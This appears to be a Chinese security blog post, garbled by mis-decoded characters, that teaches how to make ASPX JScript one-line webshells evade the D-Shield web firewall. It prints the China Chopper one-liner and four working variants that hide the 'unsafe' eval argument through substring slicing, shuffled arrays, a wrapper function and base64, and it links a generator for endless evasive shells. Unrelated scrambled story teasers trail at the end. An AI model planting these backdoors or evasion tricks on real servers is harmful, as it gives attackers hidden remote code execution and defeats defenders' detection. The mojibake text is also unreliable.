無限免殺D盾腳本之a(chǎn)spx ——yzddMr6

前言

自己曾經(jīng)寫過一篇文章:利用隨機(jī)異或無限免殺某盾

php的webshell免殺方法有很多,但是市面上很少有講aspx免殺的文章.

因為aspx的權(quán)限一般較大,對于滲透過程中還是很重要的, 所以就想著寫一篇文章來簡單的介紹下aspx的免殺

0x01 主要方法

字符串拼接
函數(shù)
數(shù)組
Base64編碼

0x02 了解aspx一句話

Aspx的一句話一般是使用Jscript語言實現(xiàn)

看看原本的菜刀aspx一句話

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

其實與php的類似
Eval函數(shù)將字符串當(dāng)做代碼執(zhí)行
不同的是在Jscript中為了安全起見必須使用unsafe參數(shù),才可以使其具有對操作系統(tǒng)操作的功能

Request.Item["pass"] 的pass就是接受的參數(shù) 類似于php的$_POST[“pass”]

Jscript基本用法

Function xxx(){}//聲明一個函數(shù)

字符串拼接

Var a =’a’+’b’;//a=’ab’;
Var a= ‘\x61’; //a=’a’;

數(shù)組聲明

Var a=’abc’;
Var b=a(0);//b=’a’;

作為免殺來說一般waf殺的都是unsafe這個參數(shù),所以我們的免殺也將從這個參數(shù)下手

0x02 字符串拼接

經(jīng)過測試,一般來說把’unsafe’這個字符串無論是十六進(jìn)制拼接還是直接大小寫拼接均不可行
于是想到可以采用substr函數(shù)

<%@ Page Language="Jscript" Debug=true%>
<%
var a=Request.Form("mr6");
var b='aaaunsaaaafe';
var b=b.substr(3,4)+b.substr(10);
eval(a,b);

%>

0x03 數(shù)組

感覺大多數(shù)waf對數(shù)組拼接并不感冒,就可以打亂順序,利用數(shù)組進(jìn)行拼接

<%@ Page Language="Jscript" Debug=true%>
<%
var a='efasnu';
var b=Request.Form("mr6");
var c=a(5)+a(4)+a(3)+a(2)+a(1)+a(0);
eval(b,c);
%>

0x04 函數(shù)

因為某盾對字符串拼接殺得比較厲害,放在函數(shù)里當(dāng)做返回值即可

<%@ Page Language="Jscript" Debug=true%>
<%
var a=Request.Form("mr6");
function ok()
{
var c="un";
var b="safe";
return c+b;
}
eval(a,ok());

%>

0x05 BASE64編碼

Php中經(jīng)常使用base64編碼來bypass,那么在aspx中如何實現(xiàn)呢

var res=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(‘eXpkZG1yNg==’);//res=’yzddmr6’;

那么我們對于unsafe這個特征就可以使用base64編碼來繞過

<%@ Page Language="Jscript" Debug=true%>
<%
var a=Request.Form("mr6");
var res=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String('dW5zYWZl'));
eval(a,res);

%>

0x06 總結(jié)

可能是因為aspx的免殺現(xiàn)在還不是很多,所以waf的查殺并不是很嚴(yán)格,不需要太復(fù)雜就可以繞過.
對于以上方法還可以連環(huán)套用,以達(dá)到混淆的效果

自己寫了個腳本,利用以上方法來無限生成免殺aspx的webshell

已經(jīng)放到了自己的項目webshell_venom中

項目地址:
https://github.com/yzddmr6/webshell-venom

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末琼开,一起剝皮案震驚了整個濱河市殊轴,隨后出現(xiàn)的幾起案子韵卤,更是在濱河造成了極大的恐慌氧苍,老刑警劉巖,帶你破解...
    沈念sama閱讀 217,406評論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件点骑,死亡現(xiàn)場離奇詭異酣难,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)黑滴,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,732評論 3 393
  • 文/潘曉璐 我一進(jìn)店門憨募,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人袁辈,你說我怎么就攤上這事菜谣。” “怎么了?”我有些...
    開封第一講書人閱讀 163,711評論 0 353
  • 文/不壞的土叔 我叫張陵尾膊,是天一觀的道長媳危。 經(jīng)常有香客問我,道長冈敛,這世上最難降的妖魔是什么待笑? 我笑而不...
    開封第一講書人閱讀 58,380評論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮抓谴,結(jié)果婚禮上暮蹂,老公的妹妹穿的比我還像新娘。我一直安慰自己癌压,他們只是感情好椎侠,可當(dāng)我...
    茶點故事閱讀 67,432評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著措拇,像睡著了一般。 火紅的嫁衣襯著肌膚如雪慎宾。 梳的紋絲不亂的頭發(fā)上丐吓,一...
    開封第一講書人閱讀 51,301評論 1 301
  • 那天,我揣著相機(jī)與錄音趟据,去河邊找鬼券犁。 笑死,一個胖子當(dāng)著我的面吹牛汹碱,可吹牛的內(nèi)容都是我干的粘衬。 我是一名探鬼主播,決...
    沈念sama閱讀 40,145評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼咳促,長吁一口氣:“原來是場噩夢啊……” “哼稚新!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起跪腹,我...
    開封第一講書人閱讀 39,008評論 0 276
  • 序言:老撾萬榮一對情侶失蹤褂删,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后冲茸,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體屯阀,經(jīng)...
    沈念sama閱讀 45,443評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,649評論 3 334
  • 正文 我和宋清朗相戀三年轴术,在試婚紗的時候發(fā)現(xiàn)自己被綠了难衰。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,795評論 1 347
  • 序言:一個原本活蹦亂跳的男人離奇死亡逗栽,死狀恐怖盖袭,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤苍凛,帶...
    沈念sama閱讀 35,501評論 5 345
  • 正文 年R本政府宣布趣席,位于F島的核電站,受9級特大地震影響醇蝴,放射性物質(zhì)發(fā)生泄漏宣肚。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,119評論 3 328
  • 文/蒙蒙 一悠栓、第九天 我趴在偏房一處隱蔽的房頂上張望霉涨。 院中可真熱鬧,春花似錦惭适、人聲如沸笙瑟。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,731評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽往枷。三九已至,卻和暖如春凄杯,著一層夾襖步出監(jiān)牢的瞬間错洁,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,865評論 1 269
  • 我被黑心中介騙來泰國打工戒突, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留屯碴,地道東北人。 一個月前我還...
    沈念sama閱讀 47,899評論 2 370
  • 正文 我出身青樓膊存,卻偏偏與公主長得像导而,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子隔崎,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,724評論 2 354